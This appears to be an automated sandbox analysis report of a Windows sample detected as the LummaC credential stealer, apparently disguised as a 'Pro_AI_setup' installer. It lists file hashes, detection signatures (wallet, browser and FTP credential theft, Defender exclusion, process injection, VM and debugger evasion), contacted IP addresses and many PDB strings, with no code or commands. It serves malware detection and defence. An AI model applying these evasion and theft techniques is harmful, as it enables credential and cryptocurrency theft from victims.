Windows Analysis Report
mDHwap5GlV.exe

Overview

General Information

Sample name: mDHwap5GlV.exe
(renamed because the original name is a hash value)
Original sample name: 1055064ac9b506a5b74090f71c4fabbe4bf077bce9bd80bfce9671e723f50cfc.exe
Analysis ID: 1561835
MD5: ff8c1b17f334e2a1ef11429bbca0351f
SHA1: 1881b5d505c081056241368e37edb69be16a6eae
SHA256: 1055064ac9b506a5b74090f71c4fabbe4bf077bce9bd80bfce9671e723f50cfc
Tags: exeNineRiversSkyRoarCommitTradeCoLtduser-JAMESWT_MHT

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to prevent local Windows debugging
Found many strings related to Crypto-Wallets (likely being stolen)
Hijacks the control flow in another process
Injects a PE file into a foreign process
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Potentially malicious time measurement code found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to harvest and steal FTP login credentials
Tries to steal cryptocurrency wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file name is different from the original file name gathered from version info
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection

Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: mDHwap5GlV.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: mDHwap5GlV.exe Static PE information: certificate valid
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49943 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49949 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: mDHwap5GlV.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net7.0\System.Linq.Expressions.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2610536524.000000000E271000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net7.0\System.Linq.pdbSHA256#0$B source: mDHwap5GlV.exe, 00000000.00000002.2587665887.000000000A930000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2587777590.000000000A9B1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net7.0\System.Net.ServicePoint.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net7.0-windows\System.Net.NameResolution.pdbSHA256A source: mDHwap5GlV.exe, 00000000.00000002.2612038536.000000000E351000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2611890775.000000000E320000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: wntdll.pdb source: decrypted_app_1.exe, 00000007.00000002.3101125278.00000000030E0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net7.0-windows/Microsoft.VisualBasic.pdbSHA2565 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net7.0-windows\System.Net.Quic.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net7.0\System.Collections.Concurrent.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: System.Net.Security.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593612711.000000000C991000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net7.0-windows/System.Management.pdb source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net7.0-windows/Microsoft.VisualBasic.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net7.0\System.Diagnostics.DiagnosticSource.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdba source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.CodeDom/Release/net7.0/System.CodeDom.pdb source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Buffers\Release\net7.0\System.Buffers.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x86\Release\System.Private.CoreLib.pdb source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\DayDerry\Pro_AI_setup_v_1.03\obj\Release\net7.0\win-x86\Pro_AI_setup_v_1.03.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\dlls\mscordac\mscordaccore.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Linq.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2587665887.000000000A930000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2587777590.000000000A9B1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices.RuntimeInformation\Release\net7.0\System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net7.0\System.Memory.pdbSHA256oY source: mDHwap5GlV.exe, 00000000.00000002.2604929693.000000000D481000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604788493.000000000D440000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Immutable\Release\net7.0\System.Collections.Immutable.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Collections.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2605844050.000000000D521000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2605777963.000000000D4D0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net7.0\System.Threading.Thread.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2609058208.000000000DEE0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb>i source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net7.0-windows\System.Diagnostics.Process.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607643100.000000000DDB0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607711334.000000000DE01000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2620268309.000000000E7F0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2620375104.000000000E811000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Data/Release/net7.0-windows/System.Data.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Contracts\Release\net7.0\System.Diagnostics.Contracts.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Timer\Release\net7.0\System.Threading.Timer.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net7.0\System.Collections.pdb source: mDHwap5GlV.exe, 00000000.00000002.2605844050.000000000D521000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2605777963.000000000D4D0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Data/Release/net7.0-windows/System.Data.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO\Release\net7.0\System.IO.pdb source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO\Release\net7.0\System.IO.pdbSHA256w source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net7.0-windows/System.Configuration.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: wntdll.pdbUGP source: decrypted_app_1.exe, 00000007.00000002.3101125278.00000000030E0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Debug\Release\net7.0\System.Diagnostics.Debug.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net7.0\System.Threading.Overlapped.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2611810679.000000000E300000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.UnmanagedMemoryStream\Release\net7.0\System.IO.UnmanagedMemoryStream.pdb source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Collections.Immutable.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: C:\Users\Administrator\Desktop\DayDerry\Pro_AI_setup_v_1.03\obj\Release\net7.0\win-x86\Pro_AI_setup_v_1.03.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Net.NameResolution.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2612038536.000000000E351000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2611890775.000000000E320000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net7.0\System.Collections.Specialized.pdb source: mDHwap5GlV.exe, 00000000.00000002.2620268309.000000000E7F0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2620375104.000000000E811000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net7.0\System.Runtime.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2582770722.0000000009AB0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.VisualBasic.Core\Release\net7.0-windows\Microsoft.VisualBasic.Core.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net7.0-windows\System.Net.Quic.pdbSHA256: source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net7.0\System.Diagnostics.Tracing.pdb source: mDHwap5GlV.exe, 00000000.00000002.2592357978.000000000C7E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net7.0\System.Runtime.InteropServices.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604677499.000000000D431000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb[ source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Quic.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net7.0\System.Threading.pdb source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595974127.000000000D041000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Timer\Release\net7.0\System.Threading.Timer.pdb source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Threading.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595974127.000000000D041000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.AppContext\Release\net7.0\System.AppContext.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: System.Net.ServicePoint.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.CSharp\Release\net7.0-windows\Microsoft.CSharp.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.Primitives\Release\net7.0\System.Security.Cryptography.Primitives.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net7.0\System.Collections.Concurrent.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.Primitives\Release\net7.0\System.Security.Cryptography.Primitives.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net7.0\System.Memory.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604929693.000000000D481000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604788493.000000000D440000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net7.0-windows\System.Net.NameResolution.pdb source: mDHwap5GlV.exe, 00000000.00000002.2612038536.000000000E351000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2611890775.000000000E320000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net7.0\System.Diagnostics.Tracing.pdbSHA256q source: mDHwap5GlV.exe, 00000000.00000002.2592357978.000000000C7E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net7.0-windows\System.Security.Cryptography.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594220011.000000000CBE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: Microsoft.CSharp.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Collections.ni.pdb; lr source: mDHwap5GlV.exe, 00000000.00000002.2605844050.000000000D521000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2605777963.000000000D4D0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net7.0\System.Runtime.pdb source: mDHwap5GlV.exe, 00000000.00000002.2582770722.0000000009AB0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Sockets.ni.pdbp source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2610536524.000000000E271000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607643100.000000000DDB0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607711334.000000000DE01000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net7.0-windows\System.Console.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583359508.0000000009AD1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594641559.000000000CDAA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2594814056.000000000CDF1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.AppContext\Release\net7.0\System.AppContext.pdb source: mDHwap5GlV.exe
Source: Binary string: Microsoft.VisualBasic.Core.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net7.0\System.Diagnostics.DiagnosticSource.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net7.0\System.Threading.ThreadPool.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net7.0\Microsoft.Win32.Primitives.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net7.0-windows\System.Net.Security.pdbSHA256S source: mDHwap5GlV.exe, 00000000.00000002.2593612711.000000000C991000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net7.0\System.Private.Uri.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594641559.000000000CDAA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2594814056.000000000CDF1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Linq.Expressions.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net7.0-windows\System.Net.Sockets.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2610536524.000000000E271000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.UnmanagedMemoryStream\Release\net7.0\System.IO.UnmanagedMemoryStream.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net7.0-windows/System.Configuration.pdb source: mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net7.0-windows\System.Net.Security.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593612711.000000000C991000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Memory.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604929693.000000000D481000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604788493.000000000D440000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Quic.ni.pdb,3 source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net7.0\System.Text.Encoding.Extensions.pdb source: mDHwap5GlV.exe, 00000000.00000002.2608346084.000000000DE60000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net7.0\System.Threading.Overlapped.pdb source: mDHwap5GlV.exe, 00000000.00000002.2611810679.000000000E300000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\Corehost.Static\singlefilehost.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Security.Cryptography.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594220011.000000000CBE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Contracts\Release\net7.0\System.Diagnostics.Contracts.pdbSHA256_O source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb]:K source: mDHwap5GlV.exe, 00000000.00000002.2607643100.000000000DDB0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607711334.000000000DE01000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net7.0-windows\System.Net.Primitives.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2583501518.0000000009B20000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583583075.0000000009B61000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices.RuntimeInformation\Release\net7.0\System.Runtime.InteropServices.RuntimeInformation.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\Release\net7.0\System.Security.Cryptography.X509Certificates.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604677499.000000000D431000.00000020.00000001.00040000.00000003.sdmp
